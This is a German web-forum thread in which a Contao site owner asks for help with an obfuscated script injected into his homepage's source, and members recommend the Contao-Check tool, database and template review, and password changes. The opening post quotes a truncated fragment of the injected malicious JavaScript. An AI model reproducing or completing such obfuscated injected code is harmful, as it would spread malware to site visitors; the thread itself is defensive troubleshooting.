Wurde meine Seite gehackt?

[g.lorenz]

Hallo liebe Forengemeinde!

Ich hoffe das ich mit meinem Problem in diesem Forum-Thema richtig bin.

Vermutlich hat sich auf eine von mir erstellte Internetseite, www.wiesengrund-ferienwohnung.de, ein Virus ein geschlichen. Er taucht auf der Startseite im Quellcode nach dem abschließenden html-Tag auf:

<script>ps="sp"+"li"+"t";asd=function(){++d.body}; a=("15,15,155,152,44,54,150,163,147,171,161,151,16 2,170,62,153,151,170,111,160,151,161,151,162,170,1 67....

Kann mir jemand Tipps geben wie ich den entferne, bzw. wo ich dieses Script in der umfangreichen CONTAO-Installation aufstöbern kann um ihn zu entfernen?

Vielen Dank im Voraus für die Hilfe und Unterstützung.

Gruß Guido

[Flex]

http://de.contaowiki.org/Contao_gehackt

[willshedo]

Du bist wirklich nicht der einzige Betroffene, das Zeug ist ziemlich verbreitet.
Etwas mehr Info, was dieser Code tut, hier

[g.lorenz]

... an der ganze Sache ist nur, das das Script bei mir im Quellcode nicht erscheint. Dies war ein Hinweis von einem Kunden. Ein paar Freunde und Bekannte habe ich gebeten die Seite aufzurufen und mit mitzuteilen was passiert -- NICHTS. Keine Fehlermeldung und kein Script am Ende des Quellcodes.

Davon ausgehend das folgende Prüfprogramme auf den Seiten http://www.urlvoid.com und https://website-klinik.de seriös sind ist dort jeweils alles im grünen Bereich.

[fabil]

Um zu sehen, ob der Contao-Core verändert wurde, kannst du den Contao-Check herunterladen und aufrufen.
Dann werden dir - im Falle korrupter Core-Dateien - diese angezeigt.

Vermutlich befindet sich es in einem Template..

https://contao.org/de/news/neuer-con...onsumfang.html

[g.lorenz]

Wo kann ich den Contao-Check denn runterladen? Finde den nicht. Oder habe ich Tomaten auf den Augen

[planepix]

Der Link steht weiter unten in der verlinkten Seite.
Direktdownload: https://codeload.github.com/contao/check/zip/master

[KlausGrenoble]

Damit da keine Fragen aufkommen:
Die zip-Datei entpacken und einfach den "check"-Ordner in das root-Verzeichnis kopieren.
Anschliessend domain.com/check/ aufrufen.
Und da, wo "More information..." steht, gibt's (wie angedeutet) auch noch mehr wichtige Informationen.
Korrupte Dateien dann einfach mit den Originaldateien überschreiben, würde ich mal als Laie sagen.

[Sven_nrw]

Ich weiß jetzt nicht, ob es was damit zu tun, aber bisher hatte ich folgende Meldung noch nie, wenn ich mit einem Firefox eine Seite aufgerufen hatte.

Die angesprochene Webseite wollte unbedingt ein neues Java Plugin installieren. Ich hatte jetzt aber nicht den Mut dies auch zu machen, um auszuprobieren, was dann dieser eventuelle Virus macht.

[fabil]

Hallo Sven,

bis die Seite nicht Schadcodefrei ist, sollte diese nicht mehr öffentlich zugänglich sein. Hast du diese vorsorglich schon vom Netz genommen?

Und hast du den Contao-Check einmal aufgerufen und nachgeschaut? :-)

Niemals dieses Java Plugin installieren! Man weiß nie, was dieses anrichten kann..

Viele Grüße

[g.lorenz]

...aufgerufen und bekomme jetzt diese Meldung:

check.jpg

Traue mich nicht da jetzt irgendwas zu installieren weil evtl. die ganze Seite dann nicht mehr funktioniert. Wollte doch eigentlich nur die Seite prüfen.

[FloB]

"Validate an existing installation"

[g.lorenz]

...erscheint dieses bild:

check2.jpg

Wie habe ich das zu interpretieren? Kann die veraltete Version 2.10... der Verursacher sein?

[lucina]

Das bedeutet, dass Du die Dateien der MusicAcademy gelöscht hast (nicht weiter tragisch) und dass die unter 'Corrupt' gelisteten Daten ... hmm ... verändert (korrumpiert) wurden und folglich durch die Originaldateien (beispielsweise von http://sourceforge.net/projects/cont...3.zip/download) ersetzt gehören.

Damit sollten die Dateien erst einmal sauber sein. Es kann allerdings ebenfalls sein, dass jemand Code in Deine Datenbank geschmuggelt hat, der dafür sorgt, dass saubere Dateien wieder mit Schadcode befüllt werden. Mal die DB anschauen, bitte, ob dort irgendwelche obskuren Inhaltselemente oder Module siedeln. Ausserdem mal den /templates-Ordner anschauen.

Aus Deinem ersten Screenshot entnehme ich obendrein, dass Du den Safemode nutzt und daher ggf. die Veränderungen via FTP vorgenommen worden sein könnten. Bitte überprüfe Dein FTP-Programm (und wechsle es, sofern es sich dabei um Filezilla handelt). Ggf. solltest Du alle Deine Passwörter ändern (Filezilla speichert die zuvorkommend im Klartext ab, so dass die Wahrscheinlichkeit, dass auch andere Passwörter bekannt sind, eher groß ist).

[pumukel]

Bitte überprüfe Dein FTP-Programm (und wechsle es, sofern es sich dabei um Filezilla handelt). Ggf. solltest Du alle Deine Passwörter ändern (Filezilla speichert die zuvorkommend im Klartext ab, so dass die Wahrscheinlichkeit, dass auch andere Passwörter bekannt sind, eher groß ist).

Hallo

Die Passwörter werden aber nur lokal, also bei mir auf meiner Kiste gespeichert. Wo ist das Problem? Ich arbeite schon bald 10 Jahre mit Filezilla und bei mir wurde noch nie eine Seite gehackt. Ausserdem hat Filezilla einen Kiosk-Mode. Nur Glück gehabt? Glaube ich nicht. Der viel zitierte WinSCP ist eben auch keine Alternative, da eine wirklich schrecklich lahme Ente.

Gruss pumukel

[MacKP]

Hier mal ein kleiner Bericht zu Filezilla: http://mrcrowley.de/testbericht/so-u...ist-filezilla/
Da steht warum das so blöde ist.. auch wie man das verhindert (wie du schon sagtest Kiosk Modus..).
Am Ende ist man selber für die Sicherheit von seinem System verantwortlich.. und naja, bei Windows ist das oft nur glücksache, auch wenn man aufpasst und alles regelmäßig updatet etc.

Viele Grüße

[stefan-at-work]

Die Passwörter werden aber nur lokal, also bei mir auf meiner Kiste gespeichert. Wo ist das Problem? l

Trojaner oder andere Arten von unberechtigetem Zugriff auf Dein System

Ausserdem hat Filezilla einen Kiosk-Mode. l

Der ist aber standardmäßig auf "0" gesetzt und muss manuell in der XML-Datei auf "1" gesetzt werden, damit er greift. Und das wissen 99% aller User nicht.